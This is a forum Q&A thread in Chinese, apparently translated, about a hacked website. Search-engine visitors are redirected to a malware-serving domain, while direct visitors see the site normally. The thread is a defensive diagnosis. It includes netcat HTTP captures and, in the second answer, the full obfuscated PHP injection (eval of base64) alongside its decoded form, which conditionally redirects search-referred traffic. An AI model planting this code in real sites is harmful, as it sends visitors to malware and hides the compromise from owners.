我发现了一些非常可疑的事情。当通过 Google 链接连接到 www.pulseexpress.com 时,服务器会将您重定向到某个非常可疑的网站,并立即向您发送一个 .exe 文件:
# host www.pulseexpress.com
www.pulseexpress.com has address 173.236.189.124
# netcat 173.236.189.124 80
GET / HTTP/1.1
Host: www.pulseexpress.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.2) Gecko/20100101
Firefox/10.0.2 Iceweasel/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en-gb;q=0.8,en;q=0.6,de-de;q=0.4,de;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer:
http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CDEQFjAA&url=http%3A%2F%2Fwww.pulseexpress.com%2F&ei=JfhkT_SuGYf40gG85MW_CA&usg=AFQjCNGlomNN7JWxEG7DUzbJyqnVFYkj7w&sig2=i5xsJPgIs1sbD6gpDzJ7OQ
HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Mar 2012 20:53:40 GMT
Server: Apache
Location: http://www.fdvrerefrr.ezua.com/
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html
但是,如果你直接在浏览器中输入地址,内容就会正常显示:
# netcat 173.236.189.124 80
GET / HTTP/1.1
Host: www.pulseexpress.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.2) Gecko/20100101
Firefox/10.0.2 Iceweasel/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en-gb;q=0.8,en;q=0.6,de-de;q=0.4,de;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 17 Mar 2012 20:53:51 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Set-Cookie: e7c55e1c7796b5e5c04e0c55afd862ea=e427sf2eh4t11jno5c4pvaal40;
path=/
Set-Cookie: virtuemart=e427sf2eh4t11jno5c4pvaal40
Set-Cookie: ja_purity_tpl=ja_purity; expires=Thu, 07-Mar-2013 20:53:53
GMT; path=/
Last-Modified: Sat, 17 Mar 2012 20:53:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4428
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
[...]
我猜这个系统已经被攻破了。而且,这次攻击似乎不简单,因为 Apache 配置肯定被修改了,只重定向了部分请求 - 这可能是为了让所有者更难注意到这个问题。
人们同意这个分析吗?
这种条件重定向技术是新的、手工制作的吗?还是标准攻击软件套件中包含的常规程序?
答案1
是的,该网站已被入侵,虽然这是一次巧妙的黑客攻击,但并不少见,过去几个月我们已多次目睹这种情况。查找过去几天/几周内修改的 .htaccess 文件,它们将充满疯狂的mod_rewrite规则。保护网站,删除/编辑损坏的文件(我会说“从备份中恢复”,但我已经放弃劝说那些习惯运行易受攻击的软件并将网站的 FTP 密码保存在易受攻击的桌面上的人建立良好的备份机制),网站将再次恢复正常。
答案2
我刚刚遇到了这个问题。重定向代码被编码在网站上每个 PHP 文件的顶部...
<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvb2dsZSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ5YW5kZXgucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibWFpbC5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly93d3cuZmR2cmVyZWZyci5lenVhLmNvbS8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0="));
...解码后是...
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"yandex.ru") or stristr($referer,"rambler.ru") or stristr($referer,"mail.ru") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://www.fdvrerefrr.ezua.com/");
exit();
}
}
}
您可以在这里找到解释... http://forums.oscommerce.com/topic/345957-evalbase64-decode-hack/